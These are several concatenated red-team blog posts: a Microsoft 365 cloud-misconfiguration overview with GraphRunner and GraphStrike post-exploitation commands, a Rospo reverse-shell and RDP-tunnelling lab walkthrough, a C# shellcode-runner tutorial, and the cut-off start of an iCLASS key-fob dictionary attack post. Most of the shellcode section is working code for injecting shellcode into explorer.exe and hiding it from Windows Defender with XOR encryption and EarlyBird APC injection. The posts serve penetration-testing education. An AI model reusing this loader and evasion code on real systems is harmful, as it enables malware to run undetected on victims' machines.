Cloud Misconfigurations

The cloud is heavily integrated into, if not the sole provider for, almost all services consumed on the internet today. This post briefly covers the current cloud marketplace background, and then looks at some of the red team tooling used, including an occasional meme and pop culture reference to take the edge off what may be a boring topic.

In true consultancy form, there are some remediations and recommendations to take away from this as well.

This blog is loosely structured to be broad initially, stating many well-known or accepted observations and anecdotes, becoming more technical as it progresses.

Feel free to leave off at any point or to skip to the parts further down; it is almost certain that one half has your type of content and the other doesn't, and the impact of reading only half is very low.

Die Wolke (The Cloud)

This is the cloud, there are many like it, but this one is not yours, it’s everyone’s and it’s everywhere. Without the cloud you are useless, you must use the cloud. You must use it better than your adversary who is trying to breach you. You must secure it before they hack you.

If life imitates art, does that mean something bad is coming for Gunnery Sergeant Microsoft? Microsoft Cloud revenue in 2023 was over US$111 billion, accounting for more than 50% of their total revenue for the year and a 22% increase from FY 2022 [12]. The recruits (clients) are not about to exit the cloud due to security concerns; the cloud is here to stay.

Cloud tenancies, be they Microsoft, AWS, or Google, have several baseline user security controls that are considered a 'must'. These are simple at first look but grow considerably more complex as you implement them, and the larger the organizational structure, the harder it is to maintain a secure posture. Least privilege is an example: for a few users it's simple, but in a large, complex organization privilege creep is real and trying to constrain privileges scales poorly.

The effort required to create, maintain, and enforce a policy for least privilege is significant. Frequently auditing user accounts and related privileges at scale may only be possible with automated tools. Failing to ensure users only have required privileges assigned to relevant accounts quite often leads to breaches that have significant impact.

Microsoft's experience with Midnight Blizzard in late 2023 and early 2024 shows exactly that [5]. The breach originated from 'a legacy non-production test tenant account', yet that account somehow had permission to access 'a very small percentage of Microsoft corporate email accounts', which included a seemingly large number of departments spanning senior leadership, cybersecurity, legal and more.

The test account, which should have had no ability to access production, led to a significant problem because of the privileges assigned to it. What other accounts or assets are languishing, forgotten by policy or ignored because they are 'DMZ', 'test' or otherwise?

One of the first rules of security is to know what assets you have. This used to be based on purchased hardware and software, a relatively direct equation, and from that inventory you could work out what you had to manage, patch and update. With cloud tenancies there is a wider range of intangible items: software, applications, configuration and storage.

Remember when the default for S3 was open buckets? Block-public-access only became the default for new buckets in April 2023 [1]. Prior to this, S3 buckets holding private files (private in terms of content sensitivity and user expectation) but unfortunately set to public access routinely appeared in the news headlines as the source of a data breach.

Configuration options for cloud services are intended to make materials shareable, collaborative, and accessible to select parties. The likelihood of a misconfigured multi-tenant environment or SharePoint Online site resulting in a data spill is not low.

Guides such as the Center for Internet Security (CIS) Microsoft 365 Foundations Benchmark [2] and tools such as the Cybersecurity and Infrastructure Security Agency (CISA) Secure Cloud Business Applications (SCuBA) assessment tool [3] are good ways to get a handle on current best practice and to help you and your organization audit the security controls of your Microsoft tenancy. These documents establish standards and can help to produce reports. The CISA SCuBA tool can be run with credentials for a Microsoft tenancy and produces an HTML-formatted report, with hyperlinks to details for each of the controls it reports against. This can be used to assess the standing of your tenancy quickly and effectively.
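To give a sense of how lightweight this is to run: ScubaGear, the PowerShell module behind SCuBA, can be installed and invoked in a few lines. The cmdlet and parameter names below are those documented in the CISA repository at the time of writing, so verify them against the current ScubaGear README before running.

# Install the ScubaGear module from the PowerShell Gallery and its dependencies
Install-Module -Name ScubaGear
Initialize-SCuBA

# Assess selected Microsoft 365 products; an HTML report is written to an output folder
Invoke-SCuBA -ProductNames aad, exo, teams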

Some of those highlighted configurations, if found to be in a lax state, are worth taking time to correct urgently.

  • Legacy Authentication
  • MFA options for privileged users
  • Teams external contacts
  • Highly Privileged User Access
  • Consent to Applications

This user environment is only part of the picture when it comes to cloud breaches. Other services store data but are not a direct user resource, such as Amazon Web Services (AWS) S3 buckets, Microsoft's Azure Blob Storage and Google Cloud Storage. Based on 2022 research, AWS holds roughly 32% of this market, Azure 23% and Google 10%, with the remainder spread across other companies [4]. The data stored in these locations also forms a type of asset that requires inventory and maintenance.

Who has access to these platforms, the storage buckets, the tenancies and the applications? Whose account has privileges that let them do more than they need, and how do you find and fix these things?

A Penetration Tester's Perspective

Figure 1.  Team Scoping Meeting

“Microsoft Graph is a RESTful web API that enables you to access Microsoft Cloud service resources.”

An increasing number of cloud penetration test tools rely on the Microsoft Graph API. Red Siege, a US-based company, recently released a Command and Control (C2) tool and based their reasoning for creating it on the number of threat actors already using the Graph API, a sound rationalisation [6, 7]. The tool, GraphStrike, is available on GitHub and extends the C2 tool Cobalt Strike by creating an HTTPS beacon over the Microsoft Graph API. It fits in as a post-compromise activity: once a set of user credentials has been breached, an attacker will set about establishing C2 communications, creating persistence mechanisms and gaining additional privileges. GraphStrike sends data out from a compromised host to graph.microsoft.com, where it is forwarded to the attacker-controlled C2 server that issues the commands. The advantage of doing this is that a Microsoft subdomain looks far more trustworthy than a strange domain communicating at suspicious intervals. You are logging and analysing your traffic for strange things, correct?

The privileges attached to an account, even a basic user's account, are critically important for an attacker to identify, the aim for more persistent threats being to establish C2. It is therefore equally important for an organization to have a clear view of privileges in its environment. Your ability to control account privileges in a large enterprise often comes from strong, clearly defined policy, applied when an account is created and any time a change is made to it. This should include clear offboarding steps for users when they depart.

An account accessible via legacy authentication (no MFA), with no active user to report suspicious system behaviour, would be very attractive to any attacker as an initial access vector. Once on this dormant account, the attacker may use a tool such as GraphRunner, another tool freely available on GitHub, created by Black Hills Information Security [11]. This tool is not a C2 product but a post-exploitation tool.

GraphRunner leverages PowerShell and an account with tenancy access to complete a device authentication flow. Once that flow is complete, the tool provides many built-in commands to enumerate, via the Microsoft Graph API, where the account has access.

Figure 2. Initializing the GraphRunner Tool with Device Authentication against a Dev365 Tenancy

Figure 3. Completion of the Authentication and Note the Token Expiration Can be Extended.

Using Invoke-GraphRecon -Tokens $tokens we can explore what our account has permission to do. In this case we have used a privileged user; lower-privileged accounts may have less to work with. An expiring set of tokens can be refreshed with Invoke-RefreshGraphTokens.
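To make that workflow concrete, a typical GraphRunner session looks roughly like the following. The function names are those exposed by the GraphRunner module at the time of writing (the token acquisition step stores its result in a $tokens variable), so check the GitHub repository if they have changed.

# Load the GraphRunner module from a local clone of the repository
Import-Module .\GraphRunner.ps1

# Start the device authentication flow shown in Figures 2 and 3
Get-GraphTokens

# Broad reconnaissance of what the authenticated account can see and do
Invoke-GraphRecon -Tokens $tokens

# Refresh the access tokens before they expire to keep the session alive
Invoke-RefreshGraphTokens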

Figure 4. Query Using the Broad Recon Command Invoke-GraphRecon

Figure 5. Some Policy Information Returned

Figure 6. User Access Rights Returned

Some of these User Settings and Policy Information results indicate that a high number of avenues are available. The field Users Can Consent to Apps: true implies that a user will be able to grant an application access by adding it to the tenancy, which can be beneficial to an attacker [8, 9]. A tool like GraphRunner can abuse this with a single function, Invoke-InjectOAuthApp, to add an application to the tenancy and persist access through state changes such as a user password change or session expiry, using the app's tokens. Fortunately, Microsoft provides advice on remediating illicitly granted applications [10]. If this feature is not required by an organisation, user consent to applications should be disabled. If it is required, then user consent for applications to access the organisation should require administrator approval.

Figure 7. Some Consent Options for Applications

The CISA tool SCuBA will report on such a configuration as seen below. Additionally, the SCuBA report embeds links to resources to aid understanding of the issue.

Figure 8. CISA SCuBA Audit Result for Applications Consent

Once an attacker understands what options exist on the compromised account, such as consenting to applications, they can leverage this to grant themselves further access: reading SharePoint files as a guest, persisting through app grants, or escalating privileges by adding themselves to other groups, all depending on the rights the compromised user has. Do your account management policies and processes cover how to manage each of these permissions?

Takeaway Points

  • Use templates such as the CIS Benchmarks as a reference model for a mature cyber security posture.
  • Use tools such as CISA SCuBA and GraphRunner to gain visibility over your current configuration.
  • Consider that C2 tools can use Microsoft cloud infrastructure to establish legitimate-looking network connections.
  • Understand that the tools mentioned in this article can be used together, standalone, or not at all; don't rely on the detection of any one thing for the defense of your important data and networks.
  • Legacy authentication, missing MFA, assets, permissions and privileges are all aspects that you need perspective and visibility into.
  • The cloud is a Stanley Kubrick film, full of horror scenes, but highly acclaimed as a masterpiece.

References

  1. (13 December 2022) Advanced notice: Amazon S3 will automatically enable S3 block public … Available at: https://aws.amazon.com/about-aws/whats-new/2022/12/amazon-s3-automatically-enable-block-public-access-disable-access-control-lists-buckets-april-2023/ (Accessed: 22 December 2023).
  2. CIS Microsoft 365 Benchmarks, CIS. Available at: https://www.cisecurity.org/benchmark/microsoft_365 (Accessed: 30 January 2024).
  3. Secure Cloud Business Applications (SCuBA) project, Cybersecurity and Infrastructure Security Agency (CISA). Available at: https://www.cisa.gov/resources-tools/services/secure-cloud-business-applications-scuba-project (Accessed: 30 January 2024).
  4. Zheldak, P. (2024) AWS vs Azure vs GCP [2024 Cloud Comparison Guide]. Available at: https://acropolium.com/blog/adopting-cloud-computing-aws-vs-azure-vs-google-cloud-what-platform-is-your-bet/ (Accessed: 30 January 2024).
  5. (19 January 2024) Microsoft Actions Following Attack by Nation State Actor Midnight Blizzard, Microsoft Security Response Center. Available at: https://msrc.microsoft.com/blog/2024/01/microsoft-actions-following-attack-by-nation-state-actor-midnight-blizzard/ (Accessed: 29 January 2024).
  6. GraphStrike: Using Microsoft Graph API to make beacon traffic disappear, redsiege.com. Available at: https://redsiege.com/blog/2024/01/graphstrike-release/ (Accessed: 30 January 2024).
  7. GraphStrike: Anatomy of Offensive Tool Development, redsiege.com. Available at: https://redsiege.com/blog/2024/01/graphstrike-developer/ (Accessed: 30 January 2024).
  8. RatulaC, Compromised and malicious applications investigation, Microsoft Learn. Available at: https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-compromised-malicious-app (Accessed: 30 January 2024).
  9. Dansimp, App consent grant investigation, Microsoft Learn. Available at: https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-app-consent#what-are-application-consent-grants (Accessed: 30 January 2024).
  10. CISA releases Microsoft 365 Secure Configuration Baselines and ScubaGear tool (2024), Cybersecurity and Infrastructure Security Agency (CISA). Available at: https://www.cisa.gov/news-events/alerts/2023/12/21/cisa-releases-microsoft-365-secure-configuration-baselines-and-scubagear-tool (Accessed: 30 January 2024).
  11. Dafthack, GraphRunner: A post-exploitation toolset for interacting with the Microsoft Graph API, GitHub. Available at: https://github.com/dafthack/GraphRunner (Accessed: 30 January 2024).
  12. Microsoft (16 October 2023) Microsoft 2023 Annual Report. Available at: https://www.microsoft.com/investor/reports/ar23/index.html (Accessed: 31 January 2024).



SSH Tunnelling with Rospo

SSH Tunnelling: A Brief Overview

SSH (Secure Shell) tunnelling is a method used to create an encrypted connection between a client and a server, allowing secure data transfer over an otherwise insecure network. It encapsulates the data in the SSH protocol, safeguarding it from potential eavesdropping, tampering, or interception.

At its core, SSH tunnelling establishes a secure channel over an unsecured network, ensuring the confidentiality and integrity of transmitted data. This technique is particularly useful in scenarios where sensitive information needs to traverse through potentially compromised networks, such as the internet.
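For readers new to the mechanics, the plain OpenSSH client already exposes the three common tunnel types; the hosts and ports below are purely illustrative.

# Local forward: reach a remote database through the SSH server on a local port
ssh -L 5432:db.internal:5432 user@jumphost.example.com

# Remote (reverse) forward: expose a local web service on the remote host
ssh -R 8080:localhost:80 user@jumphost.example.com

# Dynamic forward: a local SOCKS proxy that tunnels arbitrary traffic
ssh -D 1080 user@jumphost.example.com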

The Benefits of SSH Tunnelling

  1. Data Encryption: SSH tunnelling encrypts data transmissions, preventing unauthorized access to sensitive information.
  2. Network Security: By creating a secure channel, SSH tunnelling mitigates the risks associated with unsecured networks, such as public Wi-Fi hotspots.
  3. Bypassing Restrictions: SSH tunnelling can circumvent network restrictions imposed by firewalls or censorship, enabling access to restricted resources.
  4. Secure Remote Access: It facilitates secure remote access to services like databases, file servers, or internal systems, enhancing productivity without compromising security.

Rospo: Persistent SSH Tunnelling

As all testers and professionals would understand, network dropouts and outages can cause pulled hair, smashed keyboards and even a thrown mouse if you're mid OffSec exam.

With Rospo, the service tracks and monitors the network connection and will continually attempt to reconnect the tunnel until it succeeds. What a win! Just like the Picasso image below, Rospo will keep hammering at the tunnel until a connection is established again!

Key Features of Rospo:

  1. Ease of Use: Rospo offers an easy-to-use CLI, with help options and example commands.
  2. Multi-Platform Support: Whether you're operating on Windows, macOS, or Linux, Rospo has you covered, ensuring seamless integration across diverse environments.
  3. Flexible Configuration: With Rospo, users have granular control over tunnel configurations, allowing them to tailor settings according to their specific requirements.
  4. Dynamic Port Forwarding: Rospo allows dynamic port forwarding, enabling users to securely access services hosted on remote servers with ease.
  5. Logging and Monitoring: Rospo provides comprehensive logging and monitoring capabilities, empowering users to track tunnel activity and diagnose potential issues efficiently.

How to Get Started with Rospo:

Getting started with Rospo is ez pz. Simply head over to the GitHub repository, download the latest binary corresponding to your operating system, and you’re ready to rock and roll!

To get started with Rospo, you need to create SSH keys if you haven't already. For these examples I will be using a Windows machine as the server and a Kali machine as the client. On the Windows machine, open a CMD or PowerShell prompt and use the command:

ssh-keygen -t rsa

Next, we need to put the id_rsa.pub onto the Kali machine.

Place its contents in the authorized_keys file on the Kali machine.

Now let's start the SSH service on the Kali machine:

sudo systemctl start ssh

Let’s try to SSH into the Kali now:

ssh kali@192.168.146.130

As Borat would say, Great Success!

Now that we have access back to the Kali machine, let's set up Rospo to create an SSH tunnel that persists through outages.

We create a reverse connection to our Kali machine using the command:

.\rospo-windows-amd64.exe revshell kali@192.168.146.130:22 -T

Now, to connect to it, we run the following on the Kali machine:

ssh 127.0.0.1 -p 2222

Great Success! Let’s see what happens in a network outage.

As you can see, its monitoring picks up on the network termination and continuously tries to reconnect.

Let’s turn the network back on and see if it reconnects itself.

Nice, it reconnected!

Now let’s see what else it can do, maybe create a secure tunnel for a Remote Desktop Connection?

As you can see, RDP is currently blocked for use. Let's start up Rospo with:

.\rospo-windows-amd64.exe tun reverse -l :3389 -r :3389 kali@192.168.146.130:22

Nice, the tunnel is now set!

We try and RDP in now.

Still denied? That's because Rospo uses the SSH tunnel to proxy traffic to the RDP service; it does not open the protocol or port directly.

Rospo proxies the traffic into the client machine, aka our Kali machine, as shown below.

To connect we just need to run:

remmina -c rdp://127.0.0.1

We now have a secure tunnel to RDP into our Windows machine!

Conclusion: Be like Borat, Have Great Success!

By leveraging tools like Rospo, users can maintain secure connections, use protocols such as RDP without opening the port to the wild, and pwn those boxes without losing progress whenever the box blinks. Have fun, stay safe and get gud!


Exploring WinAPIs, C#, and Payload Encryption in Shellcode Runners

Introduction

C# stands out as a popular language choice within a red team's arsenal, and its versatility and efficiency have made it the basis for numerous penetration testing tools used worldwide, with prominent examples including Rubeus, Seatbelt, Watson, SharpView and SharpHound. While C# may not offer certain low-level functionalities inherent in languages like C or C++, such as direct memory manipulation, its strengths lie elsewhere: it supports in-memory execution and can be used to bypass detection and defences, as .NET is installed on Windows by default.

This blog post aims to explore how WinAPIs, C# and Payload Encryption can be leveraged to develop shellcode runners that bypass modern antivirus solutions.

The Fundamentals

Before delving into shellcode runners in C# using WinAPIs, it’s assumed that readers have a foundational understanding of the language’s basics and the distinction between managed and unmanaged code. This assumption allows us to focus on more advanced topics, such as allocation of memory and remote thread execution. For those seeking a primer on C# fundamentals or a refresher on managed and unmanaged code, numerous resources are available to provide a solid grounding before delving into these more complex concepts.

WinAPIs

WinAPIs, or Windows Application Programming Interfaces, are a collection of functions and procedures exposed by the Windows operating system. These APIs provide developers with a means to interact with the underlying system, enabling the creation of Windows applications that can perform a wide range of tasks, from basic file operations to advanced system-level functions. WinAPIs serve as the bridge between application code and the operating system, allowing developers to access system resources, manipulate windows, handle input/output operations, and much more.

In the context of shellcode runners, WinAPIs play a crucial role in developing malicious payloads and evading detection. For example, by leveraging WinAPI functions such as VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, shellcode runners can allocate memory, write their shellcode into the address space of another process, and then execute it remotely. These APIs provide the necessary functionality to manipulate processes and memory at a low level, enabling attackers to inject and execute their malicious code stealthily. By understanding and utilizing WinAPIs effectively, attackers can enhance the stealth and effectiveness of their shellcode runners, making them more difficult to detect and mitigate.

The MessageBox Example

Before we jump straight to the fun stuff, let’s see an example using an unmanaged API call like MessageBox. Microsoft provides the syntax for the MessageBox prototype in C++, as shown below.

int MessageBox(
    [in, optional] HWND    hWnd,
    [in, optional] LPCTSTR lpText,
    [in, optional] LPCTSTR lpCaption,
    [in]           UINT    uType
);

However, since C# doesn’t have variable datatypes named HWND or LPCTSTR, we will need to convert these C++ data types to something we are more familiar with.

A data type conversion chart can be found below. This chart is from a post by Matt Hand at SpecterOps who explains a lot of the same topics discussed in this blog post.

Using this conversion chart, we can convert HWND to IntPtr and LPCTSTR to string.

The MessageBox prototype in C# will look like this.

int MessageBox(
    IntPtr hWnd,
    string lpText,
    string lpCaption,
    uint   uType
);

Now that we have the MessageBox C# prototype, we can actually use it. To call the MessageBox function using P/Invoke in C#, we need to use the DllImport attribute to import the DLL that has the unmanaged code for us to use.

P/Invoke, short for Platform Invocation Services, is a powerful feature in C# that enables interoperability with native code libraries (often written in languages like C or C++) by allowing managed code to call unmanaged functions. This capability is particularly valuable in malware development, where access to low-level system functionality is necessary to perform various tasks, such as interacting with system APIs or manipulating memory directly. Most of the P/Invoke API is contained in two namespaces: System and System.Runtime.InteropServices.

According to the Microsoft Documentation, the dll for the MessageBox function is user32.dll.

The DllImport will look like this:

[DllImport("user32.dll")]
public static extern int MessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType);

This is a very good start; now we can actually use the external (extern) function to trigger a MessageBox!

using System;
using System.Runtime.InteropServices;
// Required namespaces

namespace demo
{
    class Program
    {
        [DllImport("user32.dll")]
        public static extern int MessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType);
        // MessageBox WinAPI Import

        static void Main(string[] args)
        {
            MessageBox(IntPtr.Zero, "Hello, this is a MessageBox!", "Alert", 0);
            // MessageBox Call
        }
    }
}

In this example, the MessageBox function is called with parameters to display a simple message box with the text “Hello, this is a MessageBox!” and the title “Alert”.

Let's build the project and see if it runs.

🎉🎉🎉

Constructing a Simple Shellcode Runner using WinAPIs

Now onto the fun stuff. We were able to display a Message Box using WinAPI, let’s see how we can create a simple shellcode runner.

For our simple shellcode runner, we will use the below WinAPIs:

  • VirtualAlloc to allocate memory,
  • CreateThread to create a thread, and
  • WaitForSingleObject to wait for the thread to exit.

Once again, we can use these WinAPIs in C# with the help of P/Invoke. An amazing resource for P/Invoke can be found at https://www.pinvoke.dev/

using System.Runtime.InteropServices;

[DllImport("kernel32.dll")]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("kernel32.dll")]
static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

Once the required WinAPIs are imported, we can start crafting our main method. We can start by initializing a byte array of our payload. For simplicity, I will be using an msfvenom generated payload that opens calc.exe.
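The exact payload doesn't matter for this walkthrough; something along the lines of the following msfvenom command produces a calc.exe payload formatted as a C# byte array (payload sizes vary between Metasploit versions):

msfvenom -p windows/x64/exec CMD=calc.exe -f csharp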

byte[] buf = new byte[276] {<shellcode_here>};

With the byte array in our main method, we can start utilizing our WinAPIs. First, we will use VirtualAlloc to allocate memory for our shellcode. The address will be set to zero (IntPtr.Zero), allowing the system to determine the allocation location dynamically. The size of the allocated memory must match the size of the shellcode (buf.Length). The allocation should be flagged as MEM_COMMIT (0x1000) and MEM_RESERVE (0x2000) to commit and reserve the memory space in one step. The protection attribute should be set to PAGE_EXECUTE_READWRITE (0x40) to enable write and execution permissions of our shellcode within the allocated memory.

int size = buf.Length;

IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)size, 0x1000 | 0x2000, 0x40);

We can utilize Marshal.Copy to insert our shellcode into the allocated memory space. This method requires four arguments: the byte array containing our shellcode, the starting index, the destination, and the size.

Marshal.Copy(buf, 0, addr, size);

The next step involves executing the shellcode, which can be achieved by utilizing CreateThread. Most of these arguments are not required for our purpose, so we can simply set them to 0 or IntPtr.Zero, appropriately. The only argument we care about is lpStartAddress, which we’ll set to the address of our allocated memory (addr).

IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);

Finally, we'll utilize WaitForSingleObject to instruct our thread to wait indefinitely. We'll set the hHandle argument to the thread handle we created with CreateThread. The value 0xFFFFFFFF is used to specify an infinite timeout period.

WaitForSingleObject(hThread, 0xFFFFFFFF);

Combining all the above components, we get the below:

using System;
using System.Runtime.InteropServices;

namespace ConsoleApp1
{
    class Program
    {
        [DllImport("kernel32.dll")]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        static void Main(string[] args)
        {
            byte[] buf = new byte[276] { <shellcode_here> };

            int size = buf.Length;

            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)size, 0x1000 | 0x2000, 0x40);

            Marshal.Copy(buf, 0, addr, size);

            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);

            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
    }
}

Let's build the shellcode runner and see if it runs.

Sweet! However, we aren't done yet. Let's turn on Windows Defender's Real Time Protection and, in my case, move the shellcode runner into a non-excluded folder. Upon executing the program again, we notice that Windows Defender eats this shellcode runner alive and prevents it from executing.

Modifying our Shellcode Runner

Let’s first modify our shellcode runner (without the msfvenom shellcode) to avoid detection because admittedly our current shellcode runner is very barebones and has most likely been used many times.

I’ve made a few modifications to the shellcode runner by utilizing a process injection technique.

Without going into too much detail about how to develop a shellcode runner utilizing process injection, I'll briefly discuss the choice of WinAPIs. Firstly, we'll be using OpenProcess to obtain a handle on a remote process. Then, instead of using VirtualAlloc, we'll utilize VirtualAllocEx, as it allows memory allocation within another process's address space. Similarly, we'll use WriteProcessMemory instead of Marshal.Copy, as we're now writing into a remote process. Finally, we'll use CreateRemoteThread to create a thread within that process.

The DllImports for these WinAPIs can be seen below.

[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(UInt32 dwDesiredAccess, bool bInheritHandle, UInt32 dwProcessId);

[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, UInt32 flAllocationType, UInt32 flProtect);

[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, ref int lpNumberOfBytesWritten);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref int lpThreadId);
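The full method body is deliberately not reproduced in this post, but to show how these imports hang together, here is a minimal sketch of a Main that injects into an already-running process. The target process (explorer.exe), the PROCESS_ALL_ACCESS access mask and the constants are illustrative choices rather than the exact implementation used for the screenshots, and the process lookup needs using System.Diagnostics;.

static void Main(string[] args)
{
    byte[] buf = new byte[276] { <shellcode_here> };

    // Pick a target process to inject into; explorer.exe is an illustrative choice
    uint pid = (uint)Process.GetProcessesByName("explorer")[0].Id;

    // 0x001F0FFF = PROCESS_ALL_ACCESS
    IntPtr hProcess = OpenProcess(0x001F0FFF, false, pid);

    // Allocate RWX memory inside the remote process (MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, buf.Length, 0x3000, 0x40);

    // Write the shellcode into the remote process
    int bytesWritten = 0;
    WriteProcessMemory(hProcess, addr, buf, buf.Length, ref bytesWritten);

    // Execute it on a new thread inside the remote process
    int threadId = 0;
    CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, ref threadId);
}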

Now let's compile this modified shellcode runner, replacing the msfvenom shellcode with dummy shellcode of the same byte array length, and see how it compares against Windows Defender.

As we can see above, our shellcode runner template is no longer detected when using more complex techniques. Now let's add our msfvenom shellcode byte array back into the modified shellcode runner.

Damn! Windows Defender once again detects our shellcode runner, even with the upgrades. But this was expected. While we've solved the problem of our shellcode runner template being detected, msfvenom payloads and many commercial products, such as Cobalt Strike, are heavily signatured and are kill-on-sight for most, if not all, antivirus solutions.

You must be wondering: if the shellcode is being detected, how can we hide or obfuscate it? Well, that leads us to the next section.

Payload Encryption

Over the years, numerous encryption and obfuscation techniques have been employed to circumvent signature detection in shellcode runners. We’ll delve into a few commonly utilized payload encryption methods and assess their effectiveness in evading detection by Microsoft’s Windows Defender.

Straight off the bat, we’ll test an absolute classic, the Caesar Cipher. The Caesar cipher on shellcode works by applying a fixed shift to each byte of the shellcode, providing a simple method of encryption.

I’ve encrypted the shellcode byte array with a fixed shift of 8 and crafted a simple decryption routine, as seen below:

static void Main(string[] args)
{
    ...
    byte[] encryptedBytes = { <encrypted_shellcode_here> };
    int key = 8;
    byte[] buf = CaesarDecryptBytes(encryptedBytes, key);
    ...
}

static byte[] CaesarDecryptBytes(byte[] encryptedBytes, int key)
{
    byte[] decryptedBytes = new byte[encryptedBytes.Length];
    for (int i = 0; i < encryptedBytes.Length; i++)
    {
        int decryptedValue = (encryptedBytes[i] - key + 256) % 256;
        decryptedBytes[i] = (byte)decryptedValue;
    }
    return decryptedBytes;
}
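For completeness, the matching encryption step (run once, offline, against the raw shellcode to produce the encrypted byte array) is simply the shift in the other direction; a minimal sketch looks like this:

static byte[] CaesarEncryptBytes(byte[] plainBytes, int key)
{
    byte[] encryptedBytes = new byte[plainBytes.Length];
    for (int i = 0; i < plainBytes.Length; i++)
    {
        // Add the fixed shift and wrap around the byte range
        encryptedBytes[i] = (byte)((plainBytes[i] + key) % 256);
    }
    return encryptedBytes;
}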

We'll add the decryption routine to our modified shellcode runner, compile it and give it a run.

Honestly, I'm very surprised a simple encryption method like the Caesar cipher was able to bypass Windows Defender. Let's compile the shellcode runner into a standalone executable using csc.exe and give it a try on a new, up-to-date Windows 11 machine (as of writing) to simulate a more realistic scenario.
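For reference, a standalone build with the .NET Framework compiler is a one-liner along these lines; the framework path shown is typical for .NET Framework 4.x installs, so adjust it to your machine:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:runner.exe Program.cs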


I had a feeling it was too good to be true. Let’s try something a little bit more complex. Next, we’ll try XOR payload encryption. XOR on shellcode works by bitwise XORing each byte of the shellcode with a chosen key, yet again providing a simple yet effective method of encryption.

Once again, I’ve encrypted the shellcode with a key and crafted the below decryption routine:

static void Main(string[] args)
{
    ...
    byte[] encryptedBytes = { <XOR_encrypted_shellcode_here> };
    byte[] bytes = XorDecryptBytes(encryptedBytes, key);
    ...
}

static byte[] XorDecryptBytes(byte[] encryptedBytes, byte[] key)
{
    byte[] decryptedBytes = new byte[encryptedBytes.Length];
    int keyLength = key.Length;
    for (int i = 0; i < encryptedBytes.Length; i++)
    {
        byte encryptedByte = encryptedBytes[i];
        byte keyByte = key[i % keyLength];
        byte decryptedByte = (byte)(encryptedByte ^ keyByte);
        decryptedBytes[i] = decryptedByte;
    }
    return decryptedBytes;
}

We'll add the decryption routine to our modified shellcode runner, compile it using csc.exe and give it a run.

Once again, we're caught on a new Windows 11 machine. I could potentially buff up the modified shellcode runner using delegates, which allow methods to be wrapped within a class, and stronger encryption, such as the Advanced Encryption Standard (AES). However, I decided to rewrite the shellcode runner again using the QueueUserAPC EarlyBird technique.

This technique involves using the QueueUserAPC function to inject shellcode into the address space of a remote process. By leveraging this technique, the shellcode can execute its payload before many security mechanisms have fully initialized, increasing its chances of remaining undetected. This approach is particularly effective because it allows malicious code to execute in the context of a legitimate process, making it harder for security software, such as Windows Defender, to detect.

The QueueUserAPC prototype can be seen below.

DWORD QueueUserAPC(
    [in] PAPCFUNC  pfnAPC,
    [in] HANDLE    hThread,
    [in] ULONG_PTR dwData
);
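Converting that prototype with the same data type mapping used earlier gives the P/Invoke signature below. The full EarlyBird runner is not reproduced here; the comments are only a rough outline of the usual sequence of calls, and the CreateProcess import with its STARTUPINFO/PROCESS_INFORMATION structs is omitted for brevity.

[DllImport("kernel32.dll")]
public static extern uint QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);

[DllImport("kernel32.dll")]
public static extern uint ResumeThread(IntPtr hThread);

// Rough EarlyBird flow:
// 1. CreateProcess a benign host (e.g. notepad.exe) in a suspended state
// 2. VirtualAllocEx + WriteProcessMemory the decrypted shellcode into it
// 3. QueueUserAPC(addr, hMainThread, IntPtr.Zero) to queue the shellcode as an APC on the main thread
// 4. ResumeThread(hMainThread) - the APC fires as the process initialises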

With the upgraded shellcode runner and our XOR encryption routine in place, compile it using csc.exe and give it a run.

Perfect! Our shellcode was successfully decrypted and executed without being detected, giving us that beautiful calculator.

Conclusion

This blog hopefully serves as a brief introduction into C# shellcode runners and their potential to circumvent modern antivirus solutions. However, in the broader context of malware development, this only begins to touch upon the surface. Numerous challenges lie ahead, including behavioural detection, Endpoint Detection and Response (EDR) systems, and the ever-evolving cat and mouse chase. Moreover, many WinAPIs, both documented and undocumented, that were not discussed in this blog can be leveraged to create advanced shellcode runners and red team tools. Keep learning and get creative!

References

Thanks to all the amazing blogs and articles that heavily inspired this post:


iCLASS Dictionary Attack

Summary 

By default, the PicoPass application on a Flipper Zero has only a very small number of keys available when performing a dictionary attack on an iCLASS key fob, resulting in a low success rate. This can be improved by including the 700+ keys from the iCopyX leak. The exact iCLASS key fob is shown in the images below. The firmware used for this attack is the Unleashed development version with extra apps (878E).

Problem

